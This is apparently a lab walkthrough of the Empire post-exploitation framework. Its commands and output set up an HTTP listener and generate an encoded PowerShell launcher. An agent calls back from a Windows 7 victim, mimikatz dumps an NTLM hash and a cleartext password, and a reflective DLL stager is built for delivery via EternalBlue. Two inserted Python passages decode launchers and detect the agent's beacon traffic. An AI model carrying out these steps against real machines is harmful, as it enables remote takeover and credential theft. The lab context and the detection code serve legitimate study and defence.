Trying out Empire version 2.3

Empire is a pentest framework that can build exploits written in PowerShell 2.0.
Rumor has it that Empire was also used in that well-known fileless malware case.

A series of malware achieving more advanced "fileless activity" confirmed

Let's install it.

root@kali:~# git clone https://github.com/EmpireProject/Empire
Cloning into 'Empire'...
remote: Counting objects: 9204, done.
remote: Compressing objects: 100% (10/10), done.
remote: Total 9204 (delta 8), reused 11 (delta 5), pack-reused 9189
Receiving objects: 100% (9204/9204), 19.18 MiB | 124.00 KiB/s, done.
Resolving deltas: 100% (6153/6153), done.
root@kali:~# cd Empire/
root@kali:~/Empire# ls
LICENSE  README.md  changelog  data  empire  lib  setup
root@kali:~/Empire# cd setup/
root@kali:~/Empire/setup# ls
cert.sh  install.sh  reset.sh  setup_database.py
root@kali:~/Empire/setup# ./install.sh 

Enter a password at the end and setup is complete. Let's start it up.

================================================================
 [Empire]  Post-Exploitation Framework
================================================================
 [Version] 2.3 | [Web] https://github.com/empireProject/Empire
================================================================

   _______ .___  ___. .______    __  .______       _______
  |   ____||   \/   | |   _  \  |  | |   _  \     |   ____|
  |  |__   |  \  /  | |  |_)  | |  | |  |_)  |    |  |__
  |   __|  |  |\/|  | |   ___/  |  | |      /     |   __|
  |  |____ |  |  |  | |  |      |  | |  |\  \----.|  |____
  |_______||__|  |__| | _|      |__| | _| `._____||_______|


       282 modules currently loaded

       0 listeners currently active

       0 agents currently active

 

It says 282 tools (modules) are available.

Switch to the listeners menu and wait for connections over HTTP.

 

(Empire) > listeners
[!] No listeners currently active 
(Empire: listeners) > uselistener http
(Empire: listeners/http) > help

Listener Commands
=================
agents            Jump to the agents menu.
back              Go back a menu.
creds             Display/return credentials from the database.
execute           Execute the given listener module.
exit              Exit Empire.
help              Displays the help menu.
info              Display listener module options.
launcher          Generate an initial launcher for this listener.
listeners         Jump to the listeners menu.
main              Go back to the main menu.
resource          Read and execute a list of Empire commands from a file.
set               Set a listener option.
unset             Unset a listener option.
(Empire: listeners/http) > info

    Name: HTTP[S]
Category: client_server

Authors:
  @harmj0y

Description:
  Starts a http[s] listener (PowerShell or Python) that uses a
  GET/POST approach.

HTTP[S] Options:

  Name              Required    Value                            Description
  ----              --------    -------                          -----------
  SlackToken        False                                        Your SlackBot API token to communicate with your Slack instance.
  ProxyCreds        False       default                          Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
  KillDate          False                                        Date for the listener to exit (MM/dd/yyyy).
  Name              True        http                             Name for the listener.
  Launcher          True        powershell -noP -sta -w 1 -enc   Launcher string.
  DefaultDelay      True        5                                Agent delay/reach back interval (in seconds).
  DefaultLostLimit  True        60                               Number of missed checkins before exiting
  WorkingHours      False                                        Hours for the agent to operate (09:00-17:00).
  SlackChannel      False       #general                         The Slack channel or DM that notifications will be sent to.
  DefaultProfile    True        /admin/get.php,/news.php,/login/ Default communication profile for the agent.
                                process.php|Mozilla/5.0 (Windows
                                NT 6.1; WOW64; Trident/7.0;
                                rv:11.0) like Gecko
  Host              True        http://10.0.2.15:80              Hostname/IP for staging.
  CertPath          False                                        Certificate path for https listeners.
  DefaultJitter     True        0.0                              Jitter in agent reachback interval (0.0-1.0).
  Proxy             False       default                          Proxy to use for request (default, none, or other).
  UserAgent         False       default                          User-agent string to use for the staging request (default, none, or other).
  StagingKey        True        7b24afc8bc80e548d66c4e7ff72171c5 Staging key for initial agent negotiation.
  BindIP            True        0.0.0.0                          The IP to bind to on the control server.
  Port              True        80                               Port for the listener.
  ServerVersion     True        Microsoft-IIS/7.5                Server header for the control server.
  StagerURI         False                                        URI for the stager. Must use /download/. Example: /download/stager.php

It feels like Metasploit, which is good!!

Change the name and port, then execute.

(Empire: listeners/http) > set Name n-lab
(Empire: listeners/http) > set port 8080
[!] Invalid option specified.
(Empire: listeners/http) > set Port 8080  (note: the "P" is uppercase)
(Empire: listeners/http) > execute
[*] Starting listener 'n-lab'
[+] Listener successfully started!

Now create the launcher.

(Empire: listeners/http) > launcher powershell
powershell -noP -sta -w 1 -enc  SQBmACgAJ・・・・・・・・

The generated string looks like it has been encoded several times over. That is perhaps the weak point of PowerShell malware.

Save the string as a .bat file. Then run it as administrator on some PC.
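The multi-layer encoding noted above is exactly what a responder has to undo when such a launcher turns up in process-creation logs. The following is an added example, not Empire's code: it lists the PowerShell switches seen in the launcher (`-noP -sta -w 1 -enc`), decodes the `-enc` argument (UTF-16LE, then base64) and keeps unwrapping any `FromBase64String('...')` blob found in the decoded script. The sample launcher, its inner raw-deflate layer and all helper names are constructed assumptions, not Empire's real stager.

```python
import base64
import re
import zlib

# Launcher flags seen on this page (-noP -sta -w 1 -enc) and their long forms
FLAG_RE = re.compile(r"(?<!\S)(-nop(?:rofile)?|-sta|-w(?:indowstyle)?|-e(?:c|nc|ncodedcommand)?)(?!\S)", re.I)
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
B64_RE = re.compile(r"FromBase64String\(['\"]([A-Za-z0-9+/=]+)['\"]\)")

def _raw_deflate(data: bytes) -> bytes:
    c = zlib.compressobj(wbits=-15)
    return c.compress(data) + c.flush()

# Constructed sample (not Empire's real stager): an inner script compressed with raw deflate
# and base64-wrapped, inside an outer script that is UTF-16LE + base64 encoded for -enc.
INNER = "Write-Host 'constructed test payload'"
OUTER = ("IEX (New-Object IO.StreamReader(New-Object IO.Compression.DeflateStream("
         "[IO.MemoryStream][Convert]::FromBase64String('"
         + base64.b64encode(_raw_deflate(INNER.encode())).decode()
         + "'),[IO.Compression.CompressionMode]::Decompress),[Text.Encoding]::ASCII)).ReadToEnd()")
LAUNCHER = "powershell -noP -sta -w 1 -enc " + base64.b64encode(OUTER.encode("utf-16le")).decode()

def launcher_flags(cmdline: str) -> set:
    """Lower-cased PowerShell switches present on the command line."""
    return {f.lower() for f in FLAG_RE.findall(cmdline)}

def peel_layers(cmdline: str, max_depth: int = 5) -> list:
    """Decode -enc (UTF-16LE base64), then keep unwrapping any FromBase64String('...') blob
    found in the previous layer (raw deflate, gzip, or plain bytes). Outermost layer first."""
    m = ENC_RE.search(cmdline)
    if not m:
        return []
    layers = [base64.b64decode(m.group(1)).decode("utf-16le")]
    while len(layers) < max_depth:
        inner = B64_RE.search(layers[-1])
        if not inner:
            break
        blob = base64.b64decode(inner.group(1))
        text = None
        for wbits in (-15, 31):  # raw deflate first, then gzip
            try:
                text = zlib.decompress(blob, wbits).decode("utf-8", "replace")
                break
            except zlib.error:
                pass
        layers.append(text if text is not None else blob.decode("utf-8", "replace"))
    return layers
```

The last element of `peel_layers(LAUNCHER)` is the readable script; in a real case that is what you hand to the analyst, not the base64 blob.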

(Empire: listeners/http) > [+] Initial agent T8BASEF9 from 10.0.2.6 now active (Slack)
(Empire: listeners/http) > agents

[*] Active agents:

  Name            Lang  Internal IP     Machine Name    Username            Process             Delay    Last Seen
  ---------       ----  -----------     ------------    ---------           -------             -----    --------------------
  T8BASEF9        ps    10.0.2.6        IE10WIN7        *IE10WIN7\IEUser    powershell/2876     5/0.0    2017-12-23 11:05:51

(Empire: agents) > interact T8BASEF9
(Empire: T8BASEF9) > sysinfo
(Empire: T8BASEF9) > sysinfo: 0|http://10.0.2.15:8080|IE10WIN7|IEUser|IE10WIN7|10.0.2.6|Microsoft Windows 7 Enterprise |True|powershell|2876|powershell|2

Listener:         http://10.0.2.15:8080
Internal IP:    10.0.2.6
Username:         IE10WIN7\IEUser
Hostname:       IE10WIN7
OS:               Microsoft Windows 7 Enterprise 
High Integrity:   1
Process Name:     powershell
Process ID:       2876
Language:         powershell
Language Version: 2

 

Let's try to obtain passwords.

(Empire: K3YGDTVF) > mimikatz
(Empire: K3YGDTVF) > 
Job started: YRN96H

Hostname: IE10Win7 / S-1-5-21-3463664321-2923530833-3546627382

  .#####.   mimikatz 2.1 (x86) built on Dec 11 2016 18:01:05
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */

mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 87244 (00000000:000154cc)
Session           : Interactive from 1
User Name         : IEUser
Domain            : IE10WIN7
Logon Server      : IE10WIN7
Logon Time        : 2017/12/23 9:52:08
SID               : S-1-5-21-3463664321-2923530833-3546627382-1000
  msv :	
   [00000003] Primary
   * Username : IEUser
   * Domain   : IE10WIN7
   * NTLM     : fc525c9683e8fe067095ba2ddc971889
   * SHA1     : e53d7244aa8727f5789b01d8959141960aad5d22
   [00010000] CredentialKeys
   * NTLM     : fc525c9683e8fe067095ba2ddc971889
   * SHA1     : e53d7244aa8727f5789b01d8959141960aad5d22
  tspkg :	
  wdigest :	
   * Username : IEUser
   * Domain   : IE10WIN7
   * Password : Passw0rd!

Hmm, I see. Next, create the DLL to be used when delivering it via EternalBlue.

(Empire: listeners/http) > main

================================================================
 [Empire]  Post-Exploitation Framework
================================================================
 [Version] 2.3 | [Web] https://github.com/empireProject/Empire
================================================================

   _______ .___  ___. .______    __  .______       _______
  |   ____||   \/   | |   _  \  |  | |   _  \     |   ____|
  |  |__   |  \  /  | |  |_)  | |  | |  |_)  |    |  |__
  |   __|  |  |\/|  | |   ___/  |  | |      /     |   __|
  |  |____ |  |  |  | |  |      |  | |  |\  \----.|  |____
  |_______||__|  |__| | _|      |__| | _| `._____||_______|


       282 modules currently loaded

       1 listeners currently active

       0 agents currently active


(Empire) > listeners

[*] Active listeners:

  Name              Module          Host                                 Delay/Jitter   KillDate
  ----              ------          ----                                 ------------   --------
  n-lab             http            http://10.0.2.15:8080                5/0.0                      


(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Name n-lab2
(Empire: listeners/http) > set DefaultJitter 0.5
(Empire: listeners/http) > set DefaultDelay 10
(Empire: listeners/http) > set Port 80
(Empire: listeners/http) > execute
[*] Starting listener 'n-lab2'
[+] Listener successfully started!

(Empire: listeners/http) > listeners

[*] Active listeners:

  Name              Module          Host                                 Delay/Jitter   KillDate
  ----              ------          ----                                 ------------   --------
  n-lab2            http            http://10.0.2.15:80                  10/0.5                     
  n-lab             http            http://10.0.2.15:8080                5/0.0                      
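The `info` output earlier shows the listener's default communication profile (the three URIs, the Trident user-agent, `DefaultDelay 5`, `DefaultJitter 0.0`), and the second listener above raises the delay to 10 and the jitter to 0.5. The following added example (not part of the original post) runs a simple check-in detector over constructed proxy log lines: it flags source/destination pairs that only ever request the default profile URIs with the default user-agent, and pairs whose request intervals are nearly constant. The hosts, timings and thresholds are constructed assumptions; it also shows why jitter alone does not hide an unchanged default profile.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Default communication profile values from the listener `info` output on this page
EMPIRE_DEFAULT_URIS = {"/admin/get.php", "/news.php", "/login/process.php"}
EMPIRE_DEFAULT_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"

def _lines(src, dst, gaps, uris, ua, start=1514026000):
    """Build constructed log lines: '<epoch> <src> <dst> <uri> <user-agent>'."""
    t, out = start, []
    for i, g in enumerate([0] + gaps):
        t += g
        out.append(f"{t} {src} {dst} {uris[i % len(uris)]} {ua}")
    return out

# Constructed sample proxy log, not captured traffic (assumed hosts and timings)
SAMPLE_LOG = (
    # agent on listener n-lab: DefaultDelay 5, DefaultJitter 0.0 -> exactly 5 s apart
    _lines("10.0.2.6", "10.0.2.15:8080", [5, 5, 5, 5, 5], sorted(EMPIRE_DEFAULT_URIS), EMPIRE_DEFAULT_UA)
    # agent on listener n-lab2: DefaultDelay 10, DefaultJitter 0.5 -> 5..15 s apart
    + _lines("10.0.2.7", "10.0.2.15:80", [7, 13, 9, 14, 6], sorted(EMPIRE_DEFAULT_URIS), EMPIRE_DEFAULT_UA)
    # ordinary browsing: irregular timing, other URI and user-agent
    + _lines("10.0.2.8", "203.0.113.10:443", [3, 40, 2, 120, 9], ["/index.html"], "Mozilla/5.0 (X11; Linux x86_64) Firefox/57.0")
)

def analyse(lines, max_cv=0.2, min_hits=5):
    """Return {(src, dst): [reasons]} for pairs that look like Empire agent check-ins."""
    seen = defaultdict(list)
    for line in lines:
        ts, src, dst, uri, ua = line.split(" ", 4)
        seen[(src, dst)].append((int(ts), uri, ua))
    findings = {}
    for key, hits in seen.items():
        if len(hits) < min_hits:
            continue
        reasons = []
        if {h[1] for h in hits} <= EMPIRE_DEFAULT_URIS:
            reasons.append("only default Empire profile URIs")
        if all(h[2] == EMPIRE_DEFAULT_UA for h in hits):
            reasons.append("default Empire profile user-agent")
        times = sorted(h[0] for h in hits)
        gaps = [b - a for a, b in zip(times, times[1:])]
        cv = pstdev(gaps) / mean(gaps) if mean(gaps) else 0.0  # 0.0 = perfectly regular
        if cv <= max_cv:
            reasons.append(f"regular beacon: mean gap {mean(gaps):.1f}s, cv {cv:.2f}")
        if reasons:
            findings[key] = reasons
    return findings
```

The jittered agent escapes the timing check but is still caught by the unchanged profile; changing only the delay and jitter, as done above, is therefore not enough to blend in.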

(Empire: listeners) > usestager windows/dll
(Empire: stager/windows/dll) > options

Name: DLL Launcher

Description:
  Generate a PowerPick Reflective DLL to inject with
  stager code.

Options:

  Name             Required    Value             Description
  ----             --------    -------           -----------
  Listener         True                          Listener to use.
  ProxyCreds       False       default           Proxy credentials
                                                 ([domain\]username:password) to use for
                                                 request (default, none, or other).
  Obfuscate        False       False             Switch. Obfuscate the launcher
                                                 powershell code, uses the
                                                 ObfuscateCommand for obfuscation types.
                                                 For powershell only.
  Proxy            False       default           Proxy to use for request (default, none,
                                                 or other).
  Language         True        powershell        Language of the stager to generate.
  OutFile          True        /tmp/launcher.dll File to output dll to.
  UserAgent        False       default           User-agent string to use for the staging
                                                 request (default, none, or other).
  Arch             True        x64               Architecture of the .dll to generate
                                                 (x64 or x86).
  ObfuscateCommand False       Token\All\1       The Invoke-Obfuscation command to use.
                                                 Only used if Obfuscate switch is True.
                                                 For powershell only.
  StagerRetries    False       0                 Times for the stager to retry
                                                 connecting.


(Empire: stager/windows/dll) > set Arch x86
(Empire: stager/windows/dll) > set Listener n-lab2
(Empire: stager/windows/dll) > set StagerRetries 10
(Empire: stager/windows/dll) > execute

[*] Stager output written out to: /tmp/launcher.dll

 

This is getting long, so the rest follows next time!